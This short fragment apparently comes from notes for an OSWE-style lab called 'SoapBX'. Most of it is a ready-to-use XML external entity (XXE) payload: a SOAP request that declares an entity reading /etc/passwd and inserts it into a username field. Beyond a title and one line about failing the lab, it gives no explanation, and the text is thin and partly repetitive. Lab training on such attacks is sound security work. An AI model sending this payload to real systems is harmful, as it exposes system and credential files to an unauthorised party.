Soapbx Oswe [work]

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <getUserInfo> <username>&xxe;</username> </getUserInfo> </soap:Body> </soap:Envelope>

If you fail at any step, you fail SoapBX. soapbx oswe